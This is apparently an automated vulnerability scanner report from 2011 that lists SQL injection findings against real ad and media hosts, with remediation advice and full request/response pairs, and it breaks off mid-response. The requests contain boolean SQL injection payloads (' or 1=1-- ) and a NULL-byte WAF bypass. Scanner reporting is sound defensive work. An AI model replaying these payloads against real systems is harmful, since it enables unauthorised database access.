28.79. http://www.advancedvoip.com/images/voip_billing_provider_p.jpg

28.80. http://www.aradial.com/images/bg.gif

28.81. http://www.att.com/media/en_US/images/ico/ico_security_AA0009X7.jpg

28.82. http://www.att.com/navservice/navservlet

28.83. http://www.att.com/u-verse/dwr/interface/DWRRequestManager.js

28.84. http://www.bostonherald.com/news/includes/twitter.inc

28.85. http://www.cpanel.net/images/logo.jpg

28.86. https://www.easynews.com/signup/lookit.phtml

28.87. http://www.giganews.com/favicon.ico

28.88. https://www.giganews.com/favicon.ico

28.89. http://www.ibm.com/developerworks/dwtagg/css/h3/dogear.css

28.90. http://www.ibm.com/developerworks/dwtags/dwjquerytabtags

28.91. http://www.ibm.com/developerworks/java/inc/author-module.inc

28.92. http://www.ibm.com/developerworks/tagging/UseCaseServlet

28.93. http://www.ibm.com/developerworks/utils/ratingJSON.jsp

28.94. http://www.mailjet.com/ajax/home/emailLiveCounter

28.95. http://www.mokafive.com/highslide/graphics/zoomin.cur

28.96. http://www.mokafive.com/highslide/graphics/zoomout.cur

28.97. http://www.mokafive.com/images/mokafive_favicon.ico

28.98. http://www.open.com.au/favicon.ico

28.99. https://www.open.com.au/favicon.ico

28.100. http://www.radius-server.net/images/bg.gif

28.101. http://www.radius-server.net/images/logo.gif

28.102. http://www.radius-server.net/images/sm-adv.gif

28.103. http://www.radius-server.net/images/telelogo.gif

28.104. http://www.radius.cistron.nl/README.pam

28.105. http://www.thundernews.com/favicon.ico

28.106. https://www.thundernews.com/favicon.ico

28.107. http://www.usenetbinaries.com/favicon.ico

28.108. http://www.websitealive2.com/89/Visitor/vTracker_v2.asp

28.109. http://www.westhost.com/favicon.ico

29. Content type is not specified

29.1. http://3ps.go.com/DynamicAd

29.2. http://ad.yieldmanager.com/st

29.3. http://ads.bluelithium.com/st

29.4. http://traffic.outbrain.com/network/redir

29.5. http://www.meebo.com/cmd/btproviders

29.6. http://www.meebo.com/cmd/tc

30. SSL certificate



1. SQL injection  next
There are 40 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://a.abc.com/service/sfp/omnitureconfig/ [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://a.abc.com
Path:   /service/sfp/omnitureconfig/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 97170536'%20or%201%3d1--%20 and 97170536'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /service97170536'%20or%201%3d1--%20/sfp/omnitureconfig/?pageId=4dc00ac0_f316_48f9_bbbc_df7e9b2d0b9b&showId=SH014193940000&pageURL=http://beta.abc.go.com/shows/charlies-angels HTTP/1.1
Host: a.abc.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 302 Moved Temporarily
Content-Length: 163
Location: http://abc.go.com/error
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abcmed01
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Sat, 17 Sep 2011 01:03:35 GMT
Connection: close

<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="http://abc.go.com/error
">http://abc.go.com/error
</A>.<BODY></HTML>

Request 2

GET /service97170536'%20or%201%3d2--%20/sfp/omnitureconfig/?pageId=4dc00ac0_f316_48f9_bbbc_df7e9b2d0b9b&showId=SH014193940000&pageURL=http://beta.abc.go.com/shows/charlies-angels HTTP/1.1
Host: a.abc.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 17 Sep 2011 01:03:38 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abcmed08
X-Powered-By: ASP.NET
Cache-Expires: Sat, 17 Sep 2011 01:08:35 GMT
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Content-Length: 0
Cache-Control: max-age=300
Date: Sat, 17 Sep 2011 01:03:38 GMT
Connection: close


1.2. http://ad.doubleclick.net/adi/N884.abc.com/B5709785.10 [id cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adi/N884.abc.com/B5709785.10

Issue detail

The id cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the id cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /adi/N884.abc.com/B5709785.10;sz=728x90;click=http://log.go.com/log?srvc%3dabc%26guid%3d7D9136E5-7896-4338-9939-E469671F34DA%26drop%3d0%26addata%3d0:91104:841141:52312%26a%3d1%26goto%3d;pc=dig841141dc1010790;ord=2011.09.16.17.57.56? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://beta.abc.go.com/shows/charlies-angels/bios
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT%00'

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7358
Set-Cookie: id=c81da3c3c0000be||t=1316221599|et=730|cs=002213fd4807e2941091f2164a; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 01:06:39 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 01:06:39 GMT
Date: Sat, 17 Sep 2011 01:06:39 GMT
Expires: Sat, 17 Sep 2011 01:06:39 GMT
Cache-Control: private, max-age=300

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Jan 27 16:06:44 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.j
...[SNIP]...
ash"];if(x && x.description){var pVF=x.description;var y=pVF.indexOf("Flash ")+6;pVM=pVF.substring(y,pVF.indexOf(".",y));}}
else if (window.ActiveXObject && window.execScript){
window.execScript('on error resume next\npVM=2\ndo\npVM=pVM+1\nset swControl = CreateObject("ShockwaveFlash.ShockwaveFlash."&pVM)\nloop while Err = 0\nOn Error Resume Next\npVM=pVM-1\nSub '+DCid+'_FSCommand(ByVal command, ByVal
...[SNIP]...

Request 2

GET /adi/N884.abc.com/B5709785.10;sz=728x90;click=http://log.go.com/log?srvc%3dabc%26guid%3d7D9136E5-7896-4338-9939-E469671F34DA%26drop%3d0%26addata%3d0:91104:841141:52312%26a%3d1%26goto%3d;pc=dig841141dc1010790;ord=2011.09.16.17.57.56? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://beta.abc.go.com/shows/charlies-angels/bios
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT%00''

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1667
Set-Cookie: id=c91da3c3c000047||t=1316221600|et=730|cs=002213fd48f445365653400eb4; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 01:06:40 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 01:06:40 GMT
Date: Sat, 17 Sep 2011 01:06:40 GMT
Expires: Sat, 17 Sep 2011 01:06:40 GMT
Cache-Control: private, max-age=300

<script type="text/javascript">
var spongecellParams = {
clickTag: "http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/f/8b/%2a/i%3B243805900%3B1-0%3B0%3B67516235%3B3454-728/90%3B42127629/42145416/1%3B
...[SNIP]...

1.3. http://ad.doubleclick.net/adj/tmz.toofab.wb.dart/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adj/tmz.toofab.wb.dart/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /adj/tmz.toofab.wb.dart/;pos=atf;boxad=1;syncad=yes;tile=1;dcopt=ist;sz=728x90,970x66;qcseg=D;ord=9367342558689416&1%00'=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.toofab.com/category/celeb-couples/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6149
Set-Cookie: id=cfbdc3c3c000003||t=1316221750|et=730|cs=002213fd486089af9086817dd8; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 01:09:10 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 01:09:10 GMT
Date: Sat, 17 Sep 2011 01:09:10 GMT
Expires: Sat, 17 Sep 2011 01:09:10 GMT
Cache-Control: private

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Sep 08 17:56:44 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
h"];if(x && x.description){var pVF=x.description;var y=pVF.indexOf("Flash ")+6;pVM=pVF.substring(y,pVF.indexOf(".",y));}}
else if (window.ActiveXObject && window.execScript){
window.execScript('on error resume next\npVM=2\ndo\npVM=pVM+1\nset swControl = CreateObject("ShockwaveFlash.ShockwaveFlash."&pVM)\nloop while Err = 0\nOn Error Resume Next\npVM=pVM-1\nSub '+DCid+'_FSCommand(ByVal command, ByVal
...[SNIP]...

Request 2

GET /adj/tmz.toofab.wb.dart/;pos=atf;boxad=1;syncad=yes;tile=1;dcopt=ist;sz=728x90,970x66;qcseg=D;ord=9367342558689416&1%00''=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.toofab.com/category/celeb-couples/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 767
Set-Cookie: id=ce3dc3c3c000038||t=1316221751|et=730|cs=002213fd48f22ac6f4531511ae; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 01:09:11 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 01:09:11 GMT
Date: Sat, 17 Sep 2011 01:09:11 GMT
Expires: Sat, 17 Sep 2011 01:09:11 GMT
Cache-Control: private

document.write('<script src=\"http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2105173&PluID=0&w=728&h=90&ord=1802222&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/3/0/%2a/j%3B
...[SNIP]...

1.4. http://adsatt.abc.starwave.com/ad/sponsors/Procter_Gamble/Sep_2011/proc-240x30-0036.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://adsatt.abc.starwave.com
Path:   /ad/sponsors/Procter_Gamble/Sep_2011/proc-240x30-0036.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /ad'%20and%201%3d1--%20/sponsors/Procter_Gamble/Sep_2011/proc-240x30-0036.gif?clickTag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clickTAG=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clicktag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D HTTP/1.1
Host: adsatt.abc.starwave.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: N7ADWEB05
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:05:08 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /ad'%20and%201%3d2--%20/sponsors/Procter_Gamble/Sep_2011/proc-240x30-0036.gif?clickTag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clickTAG=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clicktag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D HTTP/1.1
Host: adsatt.abc.starwave.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
From: n7adweb02
Content-Length: 1245
Date: Sat, 17 Sep 2011 01:05:08 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>404 - File or directory not found.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>404 - File or directory not found.</h2>
<h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>
</fieldset></div>
</div>
</body>
</html>

1.5. http://adsatt.abc.starwave.com/ad/sponsors/Procter_Gamble/Sep_2011/proc-240x30-0036.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://adsatt.abc.starwave.com
Path:   /ad/sponsors/Procter_Gamble/Sep_2011/proc-240x30-0036.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /ad/sponsors'%20and%201%3d1--%20/Procter_Gamble/Sep_2011/proc-240x30-0036.gif?clickTag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clickTAG=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clicktag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D HTTP/1.1
Host: adsatt.abc.starwave.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: N7ADWEB05
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:05:08 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /ad/sponsors'%20and%201%3d2--%20/Procter_Gamble/Sep_2011/proc-240x30-0036.gif?clickTag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clickTAG=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clicktag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D HTTP/1.1
Host: adsatt.abc.starwave.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
From: n7adweb02
Content-Length: 1245
Date: Sat, 17 Sep 2011 01:05:08 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>404 - File or directory not found.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
